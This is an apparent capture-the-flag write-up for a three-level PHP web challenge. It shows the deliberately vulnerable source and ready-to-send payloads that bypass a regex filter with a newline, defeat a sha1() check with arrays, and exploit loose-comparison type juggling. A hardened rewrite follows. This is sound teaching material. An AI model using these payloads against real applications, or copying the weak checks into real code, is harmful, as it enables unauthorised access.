Challenge
<?php
highlight_file(__FILE__);
include "./flag.php";
include "./result.php";
if(isset($_GET['aaa']) && strlen($_GET['aaa']) < 20){
    $aaa = preg_replace('/^(.*)level(.*)$/', '${1}<!-- filtered -->${2}', $_GET['aaa']);
    if(preg_match('/pass_the_level_1#/', $aaa)){
        echo "here is level 2";
        if (isset($_POST['admin']) and isset($_POST['root_pwd'])) {
            if ($_POST['admin'] == $_POST['root_pwd'])
                echo '<p>The level 2 can not pass!</p>';
            // START FORM PROCESSING
            else if (sha1($_POST['admin']) === sha1($_POST['root_pwd'])){
                echo "here is level 3,do you kown how to overcome it?";
                if (isset($_POST['level_3'])) {
                    $level_3 = json_decode($_POST['level_3']);
                    if ($level_3->result == $result) {
                        echo "success:".$flag;
                    }
                    else {
                        echo "you never beat me!";
                    }
                }
                else{
                    echo "out";
                }
            }
            else{
                die("no");
            }
            // perform validations on the form data
        }
        else{
            echo '<p>out!</p>';
        }
    }
    else{
        echo 'nonono!';
    }
    echo '<hr>';
}
?>
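Approach
- Level 1: the pattern contains ^ and $, which match the start and end positions, and . does not match a newline, so the regex can only match single-line data. A newline character bypasses it:
  ?aaa=%0apass_the_level_1%23
  The # here must be URL-encoded (%23).
- Level 2: weak comparison around sha1(), bypassed with arrays. The two arrays are different, so the == check does not reject them, and on PHP versions before 8 sha1() returns NULL for an array argument, so both sides of === are NULL. On PHP 8 and later sha1() throws a TypeError for an array instead.
  admin[]=1&root_pwd[]=2
- Level 3: weak comparison on the json_decode() result. Pass the number 0 as result. When the decoded JSON value is compared with ==, both operands are converted to the same type; here the string is converted to 0, and the value we passed in is 0. This conversion applies to PHP versions before 8; from PHP 8 on, a number no longer compares equal to a non-numeric string.
  level_3={"result":0}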
EXP
?aaa=%0apass_the_level_1%23
POST body:
admin[]=1&root_pwd[]=2&level_3={"result":0}
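
A hardened form of the three checks, added here as an example (it is not part of the original challenge or this writeup). The function names filter_level, level2_ok and level3_ok and the sample secret are assumptions made for illustration; the inputs at the bottom are the EXP payloads as PHP would see them after decoding.

```php
<?php
declare(strict_types=1);

// Level 1: same filter, but '.' now spans newlines (s modifier) and \A / \z anchor
// to the true start and end of the input, so a leading "\n" cannot hide "level".
function filter_level($aaa): ?string
{
    if (!is_string($aaa) || strlen($aaa) >= 20) {
        return null;                       // arrays and over-long input are rejected
    }
    return preg_replace('/\A(.*)level(.*)\z/s', '${1}<!-- filtered -->${2}', $aaa);
}

// Level 2: insist on strings before hashing, so sha1() never receives an array.
function level2_ok($admin, $root_pwd): bool
{
    if (!is_string($admin) || !is_string($root_pwd)) {
        return false;
    }
    return $admin !== $root_pwd && hash_equals(sha1($admin), sha1($root_pwd));
}

// Level 3: decode, check the field's type, then compare without type juggling.
function level3_ok($raw, string $result): bool
{
    if (!is_string($raw)) {
        return false;
    }
    $decoded = json_decode($raw);
    if (!is_object($decoded) || !isset($decoded->result) || !is_string($decoded->result)) {
        return false;
    }
    return hash_equals($result, $decoded->result);
}

// Constructed inputs: the three payloads from the EXP above.
$aaa = "\npass_the_level_1#";
var_dump(preg_match('/pass_the_level_1#/', (string) filter_level($aaa)));
var_dump(level2_ok(['1'], ['2']));
var_dump(level3_ok('{"result":0}', 'constructed-secret'));
```

With these checks the newline-prefixed value is filtered like any other, the array pair is rejected before hashing, and the integer 0 fails the type check on result.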